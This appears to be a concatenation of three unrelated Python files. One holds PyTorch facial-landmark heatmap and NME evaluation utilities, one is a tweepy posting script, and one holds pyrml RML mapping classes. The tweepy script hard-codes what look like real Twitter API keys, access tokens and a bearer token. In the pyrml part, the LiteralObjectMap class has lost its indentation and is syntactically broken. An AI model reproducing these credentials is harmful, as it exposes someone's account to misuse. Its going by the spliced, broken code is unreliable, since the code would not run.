        def load(self, load_dir, epoch=1):
            """Restore optimizer state and fast-forward the scheduler."""
            self.load_state_dict(torch.load(self.get_dir(load_dir)))
            if epoch > 1:
                for _ in range(epoch): self.scheduler.step()
        def get_dir(self, dir_path):
            return os.path.join(dir_path, 'optimizer.pt')
        def schedule(self):
            self.scheduler.step()
        def get_lr(self):
            return self.scheduler.get_lr()[0]
        def get_last_epoch(self):
            return self.scheduler.last_epoch
    optimizer = CustomOptimizer(trainable, **kwargs_optimizer)
    print(optimizer)
    optimizer._register_scheduler(scheduler_class, **kwargs_scheduler)
    return optimizer
def get_parameters(model, bias):
    """Yield the bias (bias=True) or weight (bias=False) tensors of every
    Conv2d, Linear and BatchNorm2d submodule of `model`, in module order."""
    for module in model.modules():
        if isinstance(module, (nn.Conv2d, nn.Linear, nn.BatchNorm2d)):
            yield module.bias if bias else module.weight
def weights_init_cpm(m):
    """Module initializer for CPM-style networks: conv weights ~ N(0, 0.01)
    with zero bias, batchnorm as the identity transform (weight 1, bias 0).
    Intended for use with Module.apply()."""
    kind = m.__class__.__name__
    if 'Conv' in kind:
        m.weight.data.normal_(0, 0.01)
        if m.bias is not None:
            m.bias.data.zero_()
    elif 'BatchNorm2d' in kind:
        m.weight.data.fill_(1)
        m.bias.data.zero_()
def resize_bi(lr, scale, interp='INTER_CUBIC'):
    """Bicubic-upscale the first image of an (N, C, H, W) tensor by `scale`
    and return it as a (1, C, H*scale, W*scale) CUDA tensor.

    NOTE(review): the `interp` parameter is ignored — cv2.INTER_CUBIC is
    always used; requires a CUDA device because of the final .cuda() call.
    """
    im = lr.cpu().numpy()[0]
    im = np.transpose(im, (1, 2, 0))  # CHW -> HWC for OpenCV
    height, width = im.shape[:2]
    im_bi = cv2.resize(im, (width*scale, height*scale), interpolation=cv2.INTER_CUBIC)
    im_bi_tensor = np.transpose(im_bi, (2, 0, 1))  # back to CHW
    im_bi_tensor = np.expand_dims(im_bi_tensor, axis=0)  # add batch dim
    return torch.from_numpy(im_bi_tensor).cuda()
def find_tensor_peak_batch(heatmap, downsample, threshold = 0.000001):
    """Sub-pixel peak localization for a batch of landmark heatmaps.

    For each of the num_pts (H, W) heatmaps: take the argmax, then refine it
    with a soft-argmax over a (2*radius+1)^2 window grid-sampled around the
    peak, and map the coordinates back to image space via `downsample`.

    Returns (locations, scores): locations is (num_pts, 2) x/y coordinates,
    scores is the per-point raw peak value.
    """
    radius = 4
    assert heatmap.dim() == 3, 'The dimension of the heatmap is wrong : {}'.format(heatmap.size())
    num_pts, H, W = heatmap.size(0), heatmap.size(1), heatmap.size(2)
    assert W > 1 and H > 1, 'To avoid the normalization function divide zero'
    # find the approximate location:
    score, index = torch.max(heatmap.view(num_pts, -1), 1)
    index_w = (index % W).float()
    # NOTE(review): `index / W` is true division on modern torch; this code
    # relies on floor-division semantics for row extraction (index // W).
    index_h = (index / W).float()
    def normalize(x, L):
        # Map pixel coordinate x in [0, L-1] to the [-1, 1] grid_sample space.
        return -1. + 2. * x.data / (L-1)
    boxes = [index_w - radius, index_h - radius, index_w + radius, index_h + radius]
    boxes[0] = normalize(boxes[0], W)
    boxes[1] = normalize(boxes[1], H)
    boxes[2] = normalize(boxes[2], W)
    boxes[3] = normalize(boxes[3], H)
    #affine_parameter = [(boxes[2]-boxes[0])/2, boxes[0]*0, (boxes[2]+boxes[0])/2,
    #                    boxes[0]*0, (boxes[3]-boxes[1])/2, (boxes[3]+boxes[1])/2]
    #theta = torch.stack(affine_parameter, 1).view(num_pts, 2, 3)
    # Affine transforms selecting each per-point window for grid_sample.
    affine_parameter = torch.zeros((num_pts, 2, 3))
    affine_parameter[:,0,0] = (boxes[2]-boxes[0])/2
    affine_parameter[:,0,2] = (boxes[2]+boxes[0])/2
    affine_parameter[:,1,1] = (boxes[3]-boxes[1])/2
    affine_parameter[:,1,2] = (boxes[3]+boxes[1])/2
    # extract the sub-region heatmap
    theta = affine_parameter.to(heatmap.device)
    grid_size = torch.Size([num_pts, 1, radius*2+1, radius*2+1])
    grid = F.affine_grid(theta, grid_size)
    sub_feature = F.grid_sample(heatmap.unsqueeze(1), grid).squeeze(1)
    # Floor tiny values at eps so the weighted average below stays finite.
    sub_feature = F.threshold(sub_feature, threshold, np.finfo(float).eps)
    X = torch.arange(-radius, radius+1).to(heatmap).view(1, 1, radius*2+1)
    Y = torch.arange(-radius, radius+1).to(heatmap).view(1, radius*2+1, 1)
    sum_region = torch.sum(sub_feature.view(num_pts,-1),1)
    # Soft-argmax offsets added to the integer peak position.
    x = torch.sum((sub_feature*X).view(num_pts,-1),1) / sum_region + index_w
    y = torch.sum((sub_feature*Y).view(num_pts,-1),1) / sum_region + index_h
    # Map heatmap coordinates back to image pixels (center-of-cell convention).
    x = x * downsample + downsample / 2.0 - 0.5
    y = y * downsample + downsample / 2.0 - 0.5
    return torch.stack([x, y],1), score
def evaluate_normalized_mean_error(predictions, groundtruth, facebb=None):
    ## compute total average normlized mean error
    # if extra_faces is not None: assert len(extra_faces) == len(predictions), 'The length of extra_faces is not right {} vs {}'.format( len(extra_faces), len(predictions) )
    # num_images = len(predictions)
    # for i in range(num_images):
    #   c, g = predictions[i], groundtruth[i]
    #   error_per_image = np.zeros((num_images,1))
    """Normalized mean error of one landmark prediction.

    `predictions`/`groundtruth` are (3, num_points) arrays: x, y and a
    visibility flag per point. The error is the mean point distance divided
    by a dataset-dependent normalizer (inter-ocular distance, or the face
    box size for 19/194-point sets). Returns (nme, accuracy@0.08, PCK curve
    samples); the AUC values computed along the way are only printed in the
    commented-out line below.
    """
    num_images = 1  # this variant evaluates a single image
    num_points = predictions.shape[1]
    error_per_image = np.zeros((1))
    for i in range(num_images):
        detected_points = predictions
        ground_truth_points = groundtruth
        # Pick the normalization distance by landmark layout.
        if num_points == 68:
            interocular_distance = np.linalg.norm(ground_truth_points[:2, 36] - ground_truth_points[:2, 45])
            assert bool(ground_truth_points[2,36]) and bool(ground_truth_points[2,45])
        elif num_points == 51 or num_points == 49:
            interocular_distance = np.linalg.norm(ground_truth_points[:2, 19] - ground_truth_points[:2, 28])
            assert bool(ground_truth_points[2,19]) and bool(ground_truth_points[2,28])
        elif num_points == 19:
            W = facebb[2] - facebb[0]
            H = facebb[3] - facebb[1]
            interocular_distance = np.sqrt(W * H)# common.faceSZ_from_pts(groundtruth) #
        elif num_points == 194:
            interocular_distance = common.faceSZ_from_pts(groundtruth)
        else:
            raise Exception('----> Unknown number of points : {}'.format(num_points))
        # Average distance over the visible points only.
        dis_sum, pts_sum = 0, 0
        for j in range(num_points):
            if bool(ground_truth_points[2, j]):
                dis_sum = dis_sum + np.linalg.norm(detected_points[:2, j] - ground_truth_points[:2, j])
                pts_sum = pts_sum + 1
        error_per_image = dis_sum / (pts_sum*interocular_distance)
    # normalise_mean_error = error_per_image.mean()
    normalise_mean_error = error_per_image
    # calculate the auc for 0.07
    max_threshold = 0.07
    threshold = np.linspace(0, max_threshold, num=2000)
    accuracys = np.zeros(threshold.shape)
    for i in range(threshold.size):
        accuracys[i] = np.sum(error_per_image < threshold[i]) * 1.0 / error_per_image.size
    area_under_curve07 = auc(threshold, accuracys) / max_threshold
    # calculate the auc for 0.08
    max_threshold = 0.08
    threshold = np.linspace(0, max_threshold, num=2000)
    accuracys = np.zeros(threshold.shape)
    for i in range(threshold.size):
        accuracys[i] = np.sum(error_per_image < threshold[i]) * 1.0 / error_per_image.size
    area_under_curve08 = auc(threshold, accuracys) / max_threshold
    accuracy_under_007 = np.sum(error_per_image<0.07) * 100. / error_per_image.size
    accuracy_under_008 = np.sum(error_per_image<0.08) * 100. / error_per_image.size
    # print('Compute NME and AUC for {:} images with {:} points :: [(nms): mean={:.3f}, std={:.3f}], auc@0.07={:.3f}, auc@0.08-{:.3f}, acc@0.07={:.3f}, acc@0.08={:.3f}'.format(num_images, num_points, normalise_mean_error*100, error_per_image.std()*100, area_under_curve07*100, area_under_curve08*100, accuracy_under_007, accuracy_under_008))
    # Sample the PCK curve at error thresholds 0.0000 .. 0.3500.
    for_pck_curve = []
    for x in range(0, 3501, 1):
        error_bar = x * 0.0001
        accuracy = np.sum(error_per_image < error_bar) * 1.0 / error_per_image.size
        for_pck_curve.append((error_bar, accuracy))
    return normalise_mean_error, accuracy_under_008, for_pck_curve
def calc_nme(args, pts, batch_heatmaps, mask, hr_np, facebb, filename, sr):
    """Compute the normalized mean error (in %) of predicted landmarks for a
    single-image batch, using the final stage of `batch_heatmaps`.

    NOTE(review): `args`, `mask`, `filename` and `sr` are unused here.
    """
    argmax = 4
    # Heatmap-to-image scaling factor derived from the HR image width.
    downsample = hr_np.shape[-1]/batch_heatmaps[0].size()[-1] #args.scale[0]
    batch_size = 1
    # The location of the current batch
    batch_locs, batch_scos = [], []
    for ibatch in range(batch_size):
        batch_location, batch_score = find_tensor_peak_batch(batch_heatmaps[-1][ibatch], downsample)
        batch_locs.append( batch_location )
        batch_scos.append( batch_score )
    batch_locs, batch_scos = torch.stack(batch_locs), torch.stack(batch_scos)
    # np_batch_locs: (1, 69, 2)
    np_batch_locs, np_batch_scos = batch_locs.detach().cpu().numpy(), batch_scos.detach().cpu().numpy()
    for i in range(len(np_batch_locs)):
        # NOTE(review): the body indexes with `ibatch` (left over from the
        # loop above) rather than `i`, and `facebb` is re-bound inside the
        # loop — this only works because batch_size is 1.
        # The last point (background channel) is dropped via [:-1].
        locations = np_batch_locs[ibatch,:-1,:]
        scores = np.expand_dims(np_batch_scos[ibatch,:-1], -1)
        prediction = np.concatenate((locations, scores), axis=1).transpose(1,0)
        groundtruth = pts[i].numpy()
        facebb = facebb[0].numpy()
        nme, accuracy_under_008, _ = evaluate_normalized_mean_error(prediction, groundtruth, facebb)
    return nme*100
|
import tweepy
# SECURITY(review): real Twitter API credentials are hard-coded below and a
# bearer token is pasted in the trailing comment. These secrets are leaked
# the moment this file is committed — revoke them and load replacements from
# environment variables or a secret store instead of source control.
creds = {
    "consumer_key": "0Ex34lGWEnplcisTVzfZV5nOv",
    "consumer_secret": "wcIasfkl8W8p4Haw3gvQpywKDdftKslRUf9okALfgTPjpf9hp9",
    "access_token": "1459501699-7yL7Yyq9TgjIQvgomwxT0ey73LSR1zNGy1MgCWV",
    "access_token_secret": "j7B1WczL0dExfO9ondn4Z61fn7hviNhTVqiZZD58VgUvS",
}
# OAuth 1.0a user-context authentication.
auth = tweepy.OAuthHandler(creds["consumer_key"], creds["consumer_secret"])
auth.set_access_token(creds["access_token"], creds["access_token_secret"])
api = tweepy.API(auth)
# Post a status update (tweet) as the authenticated user.
api.update_status("My_Bot_Message")
# bearer-token: AAAAAAAAAAAAAAAAAAAAAMXdUQEAAAAAekDLGTH2Nq55TzupcTlWeq4rGZU%3DZ7DvavQ1noNxWT7fW6aRTpzfOzSfVz7AFvxszXUj9MBhDa3uYj
|
__author__ = "Andrea Giovanni Nuzzolese"
__email__ = "andrea.nuzzolese@cnr.it"
__license__ = "Apache 2"
__version__ = "0.1"
__status__ = "Pre-Alpha"
from abc import ABC, abstractclassmethod
from builtins import staticmethod
import re, os, unidecode
from typing import Dict, Union, Set, List
from pandas.core.frame import DataFrame
from rdflib import URIRef, Graph, plugin
from rdflib.query import Processor, Result
from rdflib.namespace import RDF
from rdflib.plugins.sparql.processor import prepareQuery, SPARQLProcessor, SPARQLResult
from rdflib.term import Node, BNode, Literal, Identifier
from rdflib.parser import StringInputSource
import numpy as np
import pandas as pd
import pyrml.rml_vocab as rml_vocab
import sys
import multiprocessing
from multiprocessing import Pool
import logging
from lark import Lark
from lark.visitors import Transformer
from jinja2 import Environment, FileSystemLoader, Template
from jsonpath_ng import jsonpath, parse
import json
from pathlib import Path
import time
from datetime import timedelta
def graph_add_all(g1, g2):
    """Copy every (subject, predicate, object) triple from g2 into g1 and
    return g1."""
    for subj, pred, obj in g2:
        g1.add((subj, pred, obj))
    return g1
class TermMap(ABC):
    """Abstract base of all RML term maps; each map is identified by a
    URIRef or, when none is supplied, a fresh blank node."""

    def __init__(self, map_id: URIRef = None):
        # Fall back to a fresh blank node when no explicit id is given.
        self._id = BNode() if map_id is None else map_id

    def get_id(self) -> Union[URIRef, BNode]:
        """Return this term map's identifier."""
        return self._id

    @abstractclassmethod
    def get_mapped_entity(self) -> Node:
        pass

    @abstractclassmethod
    def to_rdf(self) -> Graph:
        pass

    @staticmethod
    @abstractclassmethod
    def from_rdf(g: Graph) -> Set[object]:
        pass
class Evaluable():
    """Interface for template fragments that can be evaluated against one
    data row; `is_iri` asks for an IRI-safe result."""

    @abstractclassmethod
    def eval(self, row, is_iri):
        pass
class Funz(Evaluable):
    """Evaluable that applies a function to arguments resolved from the row."""

    def __init__(self, fun, args):
        self.__fun = fun
        self.__args = args

    def eval(self, row, is_iri):
        """Resolve each argument against `row`, call the function, and
        IRI-fy the result when requested."""
        resolved = []
        for raw in self.__args:
            if isinstance(raw, str) and raw.strip() == '*':
                # A bare '*' means "pass the whole row".
                resolved.append(row)
            elif isinstance(raw, str):
                resolved.append(TermUtils.replace_place_holders(raw, row, False))
            else:
                resolved.append(raw)
        result = self.__fun(*resolved)
        return TermUtils.irify(result) if is_iri else result
class String(Evaluable):
    """Evaluable wrapping a literal template string with placeholders."""

    def __init__(self, string):
        self.__string = string

    def eval(self, row, is_iri):
        """Substitute row values into the template, IRI-fying when asked."""
        return TermUtils.replace_place_holders(self.__string, row, is_iri)

    def __str__(self):
        return self.__string
class Expression():
    """Ordered sequence of Evaluable fragments concatenated into one value."""

    def __init__(self):
        self._subexprs = []

    def add(self, subexpr: Evaluable):
        """Append one fragment to the expression."""
        self._subexprs.append(subexpr)

    def eval(self, row, is_iri):
        """Evaluate every fragment against `row` and join the results.

        Returns None when the joined result is empty; wraps it in a URIRef
        when `is_iri` is true.
        """
        pieces = [fragment.eval(row, is_iri) for fragment in self._subexprs]
        try:
            joined = "".join(pieces)
        except:
            # Debug aid: dump the fragments and the row before re-raising.
            print([str(fragment) for fragment in self._subexprs])
            print(row)
            for fragment in self._subexprs:
                print(fragment.eval(row, is_iri))
            raise
        if joined != '':
            return URIRef(joined) if is_iri else joined
        return None
class AbstractMap(TermMap):
    """Term map whose mapped entity may be a template string containing
    %eval:...% function directives; the template is pre-parsed into an
    Expression of alternating String and Funz fragments."""
    def __init__(self, map_id: URIRef = None, mapped_entity: Node = None):
        super().__init__(map_id)
        self._mapped_entity = mapped_entity
        self._expression = Expression()
        if mapped_entity is not None and isinstance(mapped_entity, str):
            # Match the inner body of each %eval:...% directive.
            p = re.compile('(?<=\%eval:).+?(?=\%)')
            matches = p.finditer(mapped_entity)
            #s = "'{mapped_entity}'".format(mapped_entity=mapped_entity.replace("'", "\\'"))
            s = mapped_entity
            cursor = 0
            #test = "Ciccio b'ello"
            #test = "\"{t}\"".format(t=test)
            out = ''
            #print(eval(repr(test)))
            for match in matches:
                # Widen the span to include the "%eval:" prefix (6 chars)
                # and the trailing "%".
                start = match.span()[0]-6
                end = match.span()[1]+1
                if cursor < start:
                    # Plain text between directives becomes a String fragment.
                    self._expression.add(String(s[cursor:start]))
                #print("%d, %d"%(start, end))
                function = match.group(0)
                #text = "%eval:" + function + "%"
                #function = TermUtils.replace_place_holders(function, row, False)
                result = TermUtils.get_functions(function)
                self._expression.add(Funz(result[0], result[1]))
                #print(result[0], *result[1])
                #result = "{fun}{params}".format(fun=result[0], params=tuple(result[1]))
                #print(result)
                #out += '+' + result
                cursor = end
            if cursor < len(s):
                # Trailing plain text after the last directive.
                self._expression.add(String(s[cursor:]))
                #out += '+' + s[cursor:]
            #value = TermUtils.replace_place_holders(s, row, is_iri)
    def get_mapped_entity(self) -> Node:
        """Return the raw mapped entity (template string or constant node)."""
        return self._mapped_entity
    @abstractclassmethod
    def to_rdf(self):
        pass
    @staticmethod
    @abstractclassmethod
    def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
        pass
class ObjectMap(AbstractMap):
    """Abstract RML object map; concrete subclasses turn data rows into
    RDF terms via apply()/apply_()."""
    def to_rdf(self):
        """Serialize this map as RDF: a fresh graph typing the node as
        rr:ObjectMap; subclasses add their own triples on top."""
        g = Graph('IOMemory')
        g.add((self._id, RDF.type, rml_vocab.OBJECT_MAP_CLASS))
        return g
    def apply(self, df):
        """Vectorised conversion over a whole DataFrame; overridden by subclasses."""
        pass
    def apply_(self, row):
        """Single-row conversion; overridden by subclasses."""
        pass
    @staticmethod
    @abstractclassmethod
    def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
        pass
class ConstantObjectMap(ObjectMap):
    """Object map that always produces the same constant RDF node."""
    def __init__(self, value: Node, map_id: URIRef = None):
        super().__init__(map_id, value)
        self.__value = value
    def to_rdf(self) -> Graph:
        """Serialize as rr:ObjectMap with an rr:constant triple."""
        g = super().to_rdf()
        g.add((self._id, rml_vocab.CONSTANT, self.__value))
        return g
    def apply(self, df: DataFrame):
        # Every row maps to the same constant value.
        return df.apply(lambda x: self.__value, axis=1)
    def apply_(self, row):
        return self.__value
    @staticmethod
    def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
        """Collect constant object maps from `g`: either an explicit
        rr:constant triple, or a bare IRI used directly as the constant."""
        term_maps = set()
        mappings_dict = RMLConverter.get_instance().get_mapping_dict()
        query = prepareQuery(
            """
                SELECT DISTINCT ?p ?c
                WHERE {
                    {
                        ?p rr:constant ?c1
                        BIND(?c1 AS ?c)
                    }
                    UNION
                    {
                        OPTIONAL{?p rr:constant ?c2}
                        FILTER(!BOUND(?c2))
                        FILTER(isIRI(?p))
                        BIND(?p AS ?c)
                    }
                }""",
                initNs = { "rr": rml_vocab.RR})
        if parent is not None:
            qres = g.query(query, initBindings = { "p": parent})
        else:
            qres = g.query(query)
        for row in qres:
            c = None
            if isinstance(row.p, URIRef):
                # Reuse a cached map for this IRI when available.
                if row.p in mappings_dict:
                    c = mappings_dict.get(row.p)
                else:
                    c = ConstantObjectMap(row.c, row.p)
                    # NOTE(review): `mappings_dict` is used with both .get and
                    # .add — confirm it is a custom cache type (a plain dict
                    # has no .add).
                    mappings_dict.add(c)
            else:
                c = ConstantObjectMap(row.c)
            term_maps.add(c)
        return term_maps
class LiteralObjectMap(ObjectMap):
def __init__(self, reference: Literal = None, template: Literal = None, term_type : URIRef = None, language : Literal = None, datatype : URIRef = None, map_id: URIRef = None):
    """Literal-producing object map driven by a column reference or a
    template string, with optional term type, language tag or datatype."""
    # The mapped entity is the reference when present, otherwise the template.
    mapped = template if reference is None else reference
    super().__init__(map_id, mapped)
    self._reference = reference
    self._template = template
    self._term_type = term_type
    self._language = language
    self._datatype = datatype
def to_rdf(self) -> Graph:
g = super().to_rdf()
if self._reference is not None:
g.add((self._id, rml_vocab.REFERENCE, self._reference))
elif self._template is not None:
g.add((self._id, rml_vocab.TEMPLATE, self._template))
if self._term_type is not None:
g.add((self._id, rml_vocab.TERM_TYPE, self._term_type))
if self._language is not None:
g.add((self._id, rml_vocab.LANGUAGE, self._language))
elif self._datatype is not None:
g.add((self._id, rml_vocab.DATATYPE, self._datatype))
return g
def __convertion(self, row):
literal = None
if self._reference is not None:
if self._reference.value in row:
value = row[self._reference.value]
else:
value = None
if self._template is not None:
value = TermUtils.eval_functions(self._template.value, row, False)
if value != value:
literal = None
elif self._language is not None:
language = TermUtils.eval_functions(self._language.value, row, False)
literal = Literal(value, lang=language)
elif self._datatype is not None:
datatype = TermUtils.eval_functions(str(self._datatype), row, False)
literal = Literal(value, datatype=datatype)
else:
literal = Literal(value)
return literal
def apply(self, df: DataFrame):
l = lambda x: self.__convertion(x)
df_1 = df.apply(l, axis=1)
return df_1
def apply_(self, row):
literal = None
if self._reference is not None:
if self._reference.value in row:
value = row[self._reference.value]
else:
value = None
if self._template is not None:
#value = TermUtils.eval_template(self._expression, row, False)
self._expression.eval(row, False)
if value != value:
literal = None
elif self._language is not None:
#language = TermUtils.eval_functions(self._language.value, row, False)
literal = Literal(value, lang=self._language.value)
elif self._datatype is not None:
#datatype = TermUtils.eval_functions(str(self._datatype), row, False)
literal = Literal(value, datatype=self._datatype)
else:
literal = Literal(value)
return literal
#return self.__convertion(row)
@staticmethod
def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
term_maps = set()
query = prepareQuery(
"""
SELECT DISTINCT ?p ?reference ?template ?tt ?language ?datatype
WHERE {
OPTIONAL{?p rml:reference ?reference}
OPTIONAL{?p rr:template ?template}
OPTIONAL{?p rr:termType ?tt}
OPTIONAL {?p rr:language ?language}
OPTIONAL {?p rr:datatype ?datatype}
}""",
initNs = {
"rr": rml_vocab.RR,
"rml": rml_vocab.RML
})
if parent is not None:
qres = g.query(query, initBindings = { "p": parent})
else:
qres = g.query(query)
for row in qres:
term_maps.add(LiteralObjectMap(row.reference, row.template, row.tt, row.language, row.datatype, row.p))
return term_maps
class TermObjectMap(ObjectMap):
    """General object map supporting reference, template or constant sources,
    with an rr:termType (literal by default), language and datatype."""

    def __init__(self, reference: Literal = None, template: Literal = None, constant: Union[Literal, URIRef] = None, term_type : URIRef = rml_vocab.LITERAL, language : Literal = None, datatype : URIRef = None, map_id: URIRef = None):
        super().__init__(map_id, reference if reference is not None else template)
        self._reference = reference
        self._template = template
        self._constant = constant
        self._term_type = term_type
        self._language = language
        self._datatype = datatype

    def to_rdf(self) -> Graph:
        """Serialise the source (reference/constant/template) and qualifiers."""
        g = super().to_rdf()
        if self._reference is not None:
            g.add((self._id, rml_vocab.REFERENCE, self._reference))
        elif self._constant is not None:
            # BUG FIX: the constant triple previously serialised
            # self._reference (None in this branch) instead of the constant.
            g.add((self._id, rml_vocab.CONSTANT, self._constant))
        elif self._template is not None:
            g.add((self._id, rml_vocab.TEMPLATE, self._template))
        # The original emitted this TERM_TYPE triple twice; once is enough
        # (rdflib deduplicates, so dropping the repeat is behaviour-neutral).
        if self._term_type is not None:
            g.add((self._id, rml_vocab.TERM_TYPE, self._term_type))
        if self._language is not None:
            g.add((self._id, rml_vocab.LANGUAGE, self._language))
        elif self._datatype is not None:
            g.add((self._id, rml_vocab.DATATYPE, self._datatype))
        return g

    def __convertion(self, row):
        """Build the RDF term for one row: Literal, BNode or URIRef."""
        term = None
        value = None
        if self._reference is not None:
            if self._reference.value in row:
                value = row[self._reference.value]
                # value == value filters out NaN cells before IRI-fication.
                if value == value and self._term_type is not None and self._term_type != rml_vocab.LITERAL:
                    value = TermUtils.irify(value)
            else:
                value = None
        elif self._template is not None:
            if self._term_type is None or self._term_type == rml_vocab.LITERAL:
                value = TermUtils.eval_functions(self._template.value, row, False)
            else:
                value = TermUtils.eval_functions(self._template.value, row, True)
        elif self._constant is not None:
            value = self._constant

        if value is not None and value == value:
            # The term is a literal
            if self._term_type is None or self._term_type == rml_vocab.LITERAL:
                if self._language is not None:
                    language = TermUtils.eval_functions(self._language.value, row, False)
                    term = Literal(value, lang=language)
                elif self._datatype is not None:
                    datatype = TermUtils.eval_functions(str(self._datatype), row, False)
                    term = Literal(value, datatype=datatype)
                else:
                    term = Literal(value)
            else:
                if self._term_type == rml_vocab.BLANK_NODE:
                    term = BNode(value)
                else:
                    term = URIRef(value)
        return term

    def apply(self, df: DataFrame):
        """Column-wise term generation over all rows of ``df``."""
        l = lambda x: self.__convertion(x)
        df_1 = df.apply(l, axis=1)
        return df_1

    def apply_(self, row):
        """Row-wise term generation (uses the precompiled template expression)."""
        term = None
        value = None
        if self._reference is not None:
            if self._reference.value in row:
                value = row[self._reference.value]
                if value == value and self._term_type is not None and self._term_type != rml_vocab.LITERAL:
                    value = TermUtils.irify(value)
            else:
                value = None
        elif self._template is not None:
            if self._term_type is None or self._term_type == rml_vocab.LITERAL:
                value = self._expression.eval(row, False)
            else:
                value = self._expression.eval(row, True)
        elif self._constant is not None:
            value = self._constant

        if value is not None and value == value:
            # The term is a literal
            if self._term_type is None or self._term_type == rml_vocab.LITERAL:
                if self._language is not None:
                    term = Literal(value, lang=self._language.value)
                elif self._datatype is not None:
                    term = Literal(value, datatype=self._datatype)
                else:
                    term = Literal(value)
            else:
                if self._term_type == rml_vocab.BLANK_NODE:
                    term = BNode(value)
                else:
                    term = URIRef(value)
        return term

    @staticmethod
    def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
        """Collect term object maps from ``g``, optionally scoped to ``parent``."""
        term_maps = set()
        query = prepareQuery(
            """
                SELECT DISTINCT ?p ?reference ?template ?constant ?tt ?language ?datatype
                WHERE {
                    OPTIONAL{?p rml:reference ?reference}
                    OPTIONAL{?p rr:template ?template}
                    OPTIONAL{?p rr:constant ?constant}
                    OPTIONAL{?p rr:termType ?tt}
                    OPTIONAL {?p rr:language ?language}
                    OPTIONAL {?p rr:datatype ?datatype}
                }""",
            initNs = {
                "rr": rml_vocab.RR,
                "rml": rml_vocab.RML
                })

        if parent is not None:
            qres = g.query(query, initBindings = { "p": parent})
        else:
            qres = g.query(query)

        for row in qres:
            term_maps.add(TermObjectMap(row.reference, row.template, row.constant, row.tt, row.language, row.datatype, row.p))
        return term_maps
class Predicate(AbstractMap):
    """Abstract base for predicate generators (rr:predicate / rr:predicateMap)."""

    def __init__(self, map_id: URIRef = None, mapped_entity: URIRef = None):
        super().__init__(map_id, mapped_entity)

    @abstractclassmethod
    def to_rdf(self) -> Graph:
        """Serialise this predicate definition; implemented by subclasses."""
        pass

    @abstractclassmethod
    def apply(self, df: DataFrame):
        """Column-wise predicate generation; implemented by subclasses."""
        pass

    @abstractclassmethod
    def apply_(self, row):
        """Row-wise predicate generation; implemented by subclasses."""
        pass

    @staticmethod
    @abstractclassmethod
    def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
        """Parse predicate definitions out of ``g``; implemented by subclasses."""
        pass
class ConstantPredicate(Predicate):
    """Predicate given directly as rr:predicate — the same IRI for every row."""

    def __init__(self, constant: URIRef, map_id: URIRef = None):
        super().__init__(map_id, constant)
        self._constant = constant

    def to_rdf(self) -> Graph:
        """Serialise as an rr:predicate triple."""
        out = super().to_rdf()
        out.add((self._id, rml_vocab.PREDICATE, self._constant))
        return out

    def apply(self, df: DataFrame):
        """The predicate does not depend on the data: return the constant."""
        return self._constant

    def apply_(self, row):
        """Row-wise variant: same constant."""
        return self._constant

    @staticmethod
    def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
        """Collect rr:predicate declarations from ``g``."""
        term_maps = set()
        query = prepareQuery(
            """
                SELECT DISTINCT ?p ?predicate
                WHERE {
                    ?p rr:predicate ?predicate
                }
            """,
            initNs = {
                "rr": rml_vocab.RR,
                "rml": rml_vocab.RML
                })

        if parent is not None:
            qres = g.query(query, initBindings = { "p": parent})
        else:
            qres = g.query(query)

        for binding in qres:
            term_maps.add(ConstantPredicate(binding.predicate, binding.p))
        return term_maps
class PredicateMap(Predicate):
    """rr:predicateMap — derives the predicate IRI of a triple from a column
    reference, a template, or a constant."""

    def __init__(self, triple_mapping : Union[BNode, URIRef], reference: Literal = None, template: Literal = None, constant: URIRef = None, map_id: URIRef = None):
        super().__init__(map_id, reference if reference is not None else template if template is not None else constant)
        self._reference = reference
        self._template = template
        self._constant = constant
        self._triple_mapping = triple_mapping

    def to_rdf(self) -> Graph:
        """Serialise the rr:predicateMap link and its source."""
        g = super().to_rdf()
        # BUG FIX: Graph.add takes one triple tuple; the original passed three
        # positional arguments, which raises TypeError on rdflib.
        g.add((self._triple_mapping, rml_vocab.PREDICATE_MAP, self._id))
        if self._reference is not None:
            g.add((self._id, rml_vocab.REFERENCE, self._reference))
        elif self._template is not None:
            g.add((self._id, rml_vocab.TEMPLATE, self._template))
        elif self._constant is not None:
            g.add((self._id, rml_vocab.CONSTANT, self._constant))
        return g

    def __convertion(self, row):
        """Resolve the predicate IRI for one row, or None when unresolvable."""
        # BUG FIX: value was previously unbound when no source matched.
        value = None
        if self._reference is not None:
            if self._reference.value in row:
                value = row[self._reference.value]
        elif self._template is not None:
            value = TermUtils.eval_functions(self._template.value, row, True)
        elif self._constant is not None:
            value = self._constant

        # value != value is the NaN check; None means no usable source.
        if value is None or value != value:
            predicate = None
        elif isinstance(value, URIRef):
            # BUG FIX: the original tested isinstance(predicate, URIRef) while
            # predicate was still None, so the branch never matched.
            predicate = value
        else:
            predicate = URIRef(value)
        return predicate

    def apply(self, df: DataFrame):
        """Column-wise predicate generation over all rows of ``df``."""
        l = lambda x: self.__convertion(x)
        df_1 = df.apply(l, axis=1)
        return df_1

    def apply_(self, row):
        """Row-wise predicate generation (uses the precompiled expression)."""
        value = None
        if self._reference is not None:
            if self._reference.value in row:
                value = row[self._reference.value]
        elif self._template is not None:
            value = self._expression.eval(row, True)
        elif self._constant is not None:
            value = self._constant

        if value is None or value != value:
            predicate = None
        elif isinstance(value, URIRef):
            predicate = value
        else:
            predicate = URIRef(value)
        return predicate

    @staticmethod
    def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
        """Collect predicate maps from ``g``, optionally scoped to the triples map."""
        term_maps = set()
        query = prepareQuery(
            """
                SELECT DISTINCT ?tripleMap ?predicateMap ?reference ?template ?constant
                WHERE {
                    ?tripleMap rr:predicateMap ?predicateMap
                    OPTIONAL{?predicateMap rml:reference ?reference}
                    OPTIONAL{?predicateMap rr:template ?template}
                    OPTIONAL{?predicateMap rr:constant ?constant}
                }""",
            initNs = {
                "rr": rml_vocab.RR,
                "rml": rml_vocab.RML
                })

        if parent is not None:
            qres = g.query(query, initBindings = { "tripleMap": parent})
        else:
            qres = g.query(query)

        for row in qres:
            term_maps.add(PredicateMap(row.tripleMap, row.reference, row.template, row.constant, row.predicateMap))
        return term_maps
class PredicateBuilder():
